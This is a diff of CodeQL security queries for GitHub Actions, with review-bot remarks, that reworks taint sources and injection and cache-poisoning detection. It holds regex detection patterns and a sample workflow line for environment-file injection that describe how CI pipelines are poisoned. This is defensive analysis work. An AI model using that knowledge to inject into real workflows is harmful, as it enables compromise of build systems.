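Review bot: Dropping `"github\\.event\\.inputs"` and `"github\\.event\\.inputs\\[[0-9]+\\]"` from `textEvent` removes a taint source with no stated reason. The `jsonEvent` hunk removes the same context, and a later FlowSources.qll hunk deletes `CompositeActionInputSource`. The ParameterPosition and ParameterNode hunks suggest inputs are now tracked as parameters from the caller rather than as remote input. If so, a short comment beside the list would stop a maintainer from re-adding them or assuming `workflow_dispatch` inputs are still covered, for example `// inputs are modelled as parameters (see ParameterNode), not as remote sources`. A test workflow that interpolates `github.event.inputs.*` into a `run:` step would pin the new expected result.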
@@ -181,7 +179,7 @@ private predicate jsonEvent(string context) { "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.issue", "github\\.event\\.merge_group", "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", @@ -193,7 +191,7 @@ private predicate jsonEvent(string context) { "github\\.event\\.workflow_run\\.pull_requests", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -204,9 +202,9 @@ class GitHubSource extends RemoteFlowSource { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - Utils::normalizeExpr(context) = "github.head_ref" and + normalizeExpr(context) = "github.head_ref" and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } 
@@ -218,11 +216,18 @@ class GitHubEventSource extends RemoteFlowSource { string flag; GitHubEventSource() { - exists(Expression e, string context, string context_prefix | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + exists(e.getEnclosingCompositeAction()) + ) | titleEvent(context) and flag = "title" or @@ -258,11 +263,11 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + normalizeExpr(context).matches("%" + context_prefix + "%") ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") + normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") ) ) and flag = "json" @@ -283,17 +288,6 @@ class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } -/** - * An input for a Composite Action - */ -class CompositeActionInputSource extends RemoteFlowSource { - CompositeAction c; - - CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - - override string getSourceType() { result = "input" } -} - /** * A downloaded artifact. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cb391f2a262..bbc40d56e2b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
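Review bot: In the `GitHubEventJsonSource` hunk the new pattern `".*\\bgithub.event\\b.*"` leaves the dot between `github` and `event` unescaped, so it matches any character there (for example `github_event`), unlike the other context regexes in this file. It should read `normalizeExpr(context).regexpMatch(".*\\bgithub\\.event\\b.*")`. The old pattern `github(\\.event)?` also accepted a bare `github` context, which `jsonEvent` still lists. If dropping that case from this disjunct is intended, a comment saying so would help. The class body starts outside the hunk.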
@@ -35,9 +35,9 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and ( - Utils::writeToGitHubEnv(run, _, value) or - Utils::writeToGitHubOutput(run, _, value) or - Utils::writeToGitHubPath(run, value) + writeToGitHubEnv(run, _, value) or + writeToGitHubOutput(run, _, value) or + writeToGitHubPath(run, value) ) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and succ.asExpr() = run.getScriptScalar() @@ -61,7 +61,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(varName) and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -72,7 +72,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: pred.asExpr() = run.getInScopeEnvVarExpr(varName) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -88,7 +88,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } 
@@ -100,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index f63af3c10be..b6b7cd53927 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -67,7 +67,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called + * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof Uses } @@ -91,7 +91,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else if this instanceof CompositeAction - then result = this.(CompositeAction).getLocation().getFile().getRelativePath() + then + result = + this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .prefix(this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .indexOf(["/action.yml", "/action.yaml"])) else none() } } 
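Review bot: In `DataFlowCallable.getName()` the composite-action branch has no result when the file's relative path is just `action.yml` or `action.yaml` (an action at the repository root), because `indexOf(["/action.yml", "/action.yaml"])` needs a leading slash. Such an action would then have no name for call resolution. Whether root-level actions need to resolve is not visible here, so either handle that case explicitly or document that it is excluded. Binding the path once would also remove the duplicated call chain: `exists(string p | p = this.(CompositeAction).getLocation().getFile().getRelativePath() | result = p.prefix(p.indexOf(["/action.yml", "/action.yaml"])))`. The class starts outside the hunk.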
@@ -156,7 +166,10 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) } + ParameterPosition() { + exists(any(ReusableWorkflow w).getInput(this)) or + exists(any(CompositeAction a).getInput(this)) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 681d6f1cfc3..87e8124db91 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -53,7 +53,8 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflow).getInput(pos) + input = c.(ReusableWorkflow).getInput(pos) or + input = c.(CompositeAction).getInput(pos) } override string toString() { result = "input " + input.toString() } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 25de24032ba..b17b4bc6b0d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -12,7 +12,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) 
@@ -32,7 +32,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { exists(Run run, Expression expr, string varname, string value | this.asExpr().getInScopeEnvVarExpr(varname) = expr and run.getScriptScalar() = this.asExpr() and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and ( value.matches("%$" + ["", "{", "ENV{"] + varname + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0467a51f4e9..12919004c03 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -11,7 +11,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | expr = run.getInScopeEnvVarExpr(varname) and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and run.getScriptScalar() = this.asExpr() and value.matches("%$" + ["", "{", "ENV{"] + varname + "%") ) @@ -23,7 +23,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 070dcbda532..40dfbd3a0b0 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -75,7 +75,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - Utils::writeToGitHubEnv(this, _, value) and + writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index f6598f1faaf..aeceaa8da75 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -4,7 +4,7 @@ import codeql.actions.DataFlow bindingset[s] predicate containsPullRequestNumber(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b", "\\bgithub\\.event\\.pull_request\\.id\\b", @@ -24,7 +24,7 @@ predicate containsPullRequestNumber(string s) { bindingset[s] predicate containsHeadSHA(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", @@ -51,7 +51,7 @@ predicate containsHeadSHA(string s) { bindingset[s] predicate containsHeadRef(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", 
@@ -234,7 +234,7 @@ class LabelControlCheck extends ControlCheck { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" ], _, _) @@ -248,7 +248,7 @@ class ActorControlCheck extends ControlCheck { // eg: github.triggering_actor != 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", @@ -262,7 +262,7 @@ class AssociationControlCheck extends ControlCheck { AssociationControlCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.comment\\.author_association\\b", "\\bgithub\\.event\\.issue\\.author_association\\b", diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 702a454645c..27cad8b98a4 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -16,7 +16,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "test.yml" + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" } predicate isSink(DataFlow::Node sink) { none() } 
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql similarity index 74% rename from ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql rename to ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index a25473fd812..fc96c3d4353 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -4,8 +4,8 @@ * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-envpath-injection + * @precision very-high + * @id actions/envpath-injection/critical * @tags actions * security * external/cwe/cwe-077 @@ -19,14 +19,17 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - // sink belongs to a privileged job - sink.getNode().asExpr().getEnclosingJob().isPrivileged() and ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + inPrivilegedCompositeAction(sink.getNode().asExpr()) or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and + ( source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink + or + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" ) select sink.getNode(), source, sink, - "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", + "Potential PATH environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql similarity index 78% rename from ql/src/Security/CWE-077/EnvPathInjection.ql rename to ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index 80d1729b267..cc067598c89 100644 
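Review bot: Changing `@id` from `actions/privileged-envpath-injection` to `actions/envpath-injection/critical` gives the query a new rule identity, and the same applies to the other renamed queries under CWE-077, CWE-078 and CWE-094. Anything keyed on the old ids, such as query suites or filters and alert or dismissal history in the consuming tool, will presumably stop matching. For a security query that can mean a silently dropped rule. I would record the old-to-new id mapping in a change note so consumers can update their configuration.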
--- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envpath-injection + * @id actions/envpath-injection/medium * @tags actions * security * external/cwe/cwe-077 @@ -20,14 +20,9 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql similarity index 77% rename from ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 5311d9a4de8..4b0799ca441 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -4,8 +4,8 @@ * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-envvar-injection + * @precision very-high + * @id actions/envvar-injection/critical * @tags actions * security * external/cwe/cwe-077 
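Review bot: In EnvPathInjectionMedium.ql the source/sink filter is attached only to `inNonPrivilegedJob(...)`, because `and` binds tighter than `or`. A sink in a non-privileged composite action is therefore reported without that filter, whereas the Critical queries in this commit parenthesise both context predicates before applying it. EnvVarInjectionMedium.ql has the same shape with `artifactToFileRead`. If the filter is meant for both contexts, group them as the Critical queries do: `( inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or inNonPrivilegedJob(sink.getNode().asExpr()) ) and`. The filter expression continues outside this hunk.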
@@ -28,10 +28,13 @@ predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - // sink belongs to a privileged job - sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, - "Potential privileged environment variable injection in $@, which may be controlled by an external user.", + "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql similarity index 80% rename from ql/src/Security/CWE-077/EnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 8c251095457..7eb239e83a0 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envvar-injection + * @id actions/envvar-injection/medium * @tags actions * security * external/cwe/cwe-077 
@@ -29,14 +29,9 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) ) diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql similarity index 59% rename from ql/src/Security/CWE-078/PrivilegedCommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionCritical.ql index adb8f25f077..2c2ab2f2af5 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Command built from user-controlled sources on a privileged context + * @name Command built from user-controlled sources * @description Building a system command from user-controlled sources is vulnerable to insertion of * malicious code by the user. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-command-injection + * @precision very-high + * @id actions/command-injection/critical * @tags actions * security * external/cwe/cwe-078 
@@ -19,10 +19,11 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged command injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + "Potential command injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql similarity index 79% rename from ql/src/Security/CWE-078/CommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionMedium.ql index 6ac15f83207..072ebbc8dce 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -6,7 +6,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/command-injection + * @id actions/command-injection/medium * @tags actions * security * external/cwe/cwe-078 @@ -20,12 +20,8 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, 
diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql similarity index 68% rename from ql/src/Security/CWE-094/PrivilegedCodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionCritical.ql index d043bd930b6..7e14825a295 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Code injection on a privileged context + * @name Code injection * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary * code execution. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-code-injection + * @precision very-high + * @id actions/code-injection/critical * @tags actions * security * external/cwe/cwe-094 @@ -21,10 +21,11 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged code injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql similarity index 77% rename from ql/src/Security/CWE-094/CodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionMedium.ql index aa5bbfdf75a..7599ef8847b 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql 
@@ -5,8 +5,8 @@ * @kind path-problem * @problem.severity warning * @security-severity 5.0 - * @precision high - * @id actions/code-injection + * @precision medium + * @id actions/code-injection/medium * @tags actions * security * external/cwe/cwe-094 @@ -22,12 +22,8 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 0250d9aada1..80ebd92c5d3 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -18,22 +18,24 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout, Step s where - // The workflow runs in the context of the default branch + // the workflow runs in the context of the default branch runsOnDefaultBranch(j) and - // The job checkouts untrusted code from a pull request + // the job checkouts untrusted code from a pull request // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and + // job can be triggered by an external user + j.isExternallyTriggerable() and ( - // The job writes to the cache + // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and s instanceof CacheWritingStep or - // The job executes checked-out code + // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and s instanceof PoisonableStep and - // Excluding privileged workflows since they can be easily exploited in similar circumstances + // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 5d739d746d5..1c13497ddaf 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
@@ -21,7 +21,9 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and - // Excluding privileged workflows since they can be easily exploited in similar circumstances + // job can be triggered by an external user + j.isExternallyTriggerable() and + // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch runsOnDefaultBranch(j) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 6b3e0628f40..2144db7afa0 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where + // the job can be triggered by an external user + check.getEnclosingJob().isExternallyTriggerable() and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution @@ -25,7 +27,7 @@ where // label gates do not depend on the triggering event check instanceof LabelControlCheck or - // actor or Association gates apply to IssueOps only + // actor or association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index fcf83269960..11dfa7fc567 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
